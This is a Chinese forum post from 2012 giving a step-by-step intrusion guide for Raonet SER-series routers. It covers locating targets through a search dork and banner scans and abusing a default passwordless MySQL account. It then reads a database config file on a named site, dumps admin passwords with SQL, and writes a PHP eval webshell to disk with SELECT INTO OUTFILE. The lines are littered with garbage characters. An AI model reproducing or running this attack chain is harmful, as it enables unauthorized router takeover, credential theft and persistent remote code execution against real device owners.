寻找存在漏洞的路由器方法:* W4 {9 `. R$ b E
, x1 l8 g' Y" U. e) v3 G
1:google搜索'Raonet Subscriber Ethernet Router'
4 M: \8 O# G+ R1 F9 C7 S! l9 O8 _. f$ b/ S, O8 Q s0 ^5 {# C
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
. K, Q9 D6 K) f# e. X5 J( U+ {
& G- v* a" o5 w3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
( x+ v1 R3 |1 C% i% }
$ ]5 C' r# X# K* G4 O5 Y& ?//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......7 g+ t2 U- n, y" _
O' Q% w* W, A
) L' @5 p9 s; n& F3 c5 D! V' e- V* S# v9 a
入侵步骤:: `: q0 y. }9 O3 y' Y! P7 R
2 E! }5 C0 ~% z" B. V1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php) e. m7 G' x1 ?& k9 Z# V. p6 p+ C
2 L# \$ Y- i! ~" u7 c
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
6 ~/ K' `+ p+ B4 }" Z: R3:得到密码后连接,查看GUI管理密码:
4 r$ W& c* ^# Z/ L) ]7 T! Buse ser_500& W5 q1 N+ P/ q( ~" @3 N' d1 N2 O
select id,passwd from user;. F2 }; F' B4 V# g
4:通过数据库写入webshell,执行命令:
' b( C1 T8 q, y& [5 e0 c& P. Y5 Kuse mysql; U. H( x" m( f3 Y, ~: `* G* w
create table ok(cmd TEXT);, K1 F0 }. }& U2 d$ [
insert into ok values("<?php @eval($_POST[cmd])?>");. I+ v& W Z" \$ z2 [) ?
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
1 ^6 i) S' J0 a* j) b5 u: ^drop table ok;/ ?& c& f; @2 ^+ f
4 P5 y; U0 s$ [' n
5:连接后门shell.php
6 q( u+ [) r, K; I. o( `. N+ K8 @* l$ b0 v
6. 搞定!
; H" f$ X" x a' `% E5 E2 } Y: x$ J/ q
|
发表于 2012-12-10 10:30:18
收藏
支持
反对
发表于 2013-7-27 20:06:50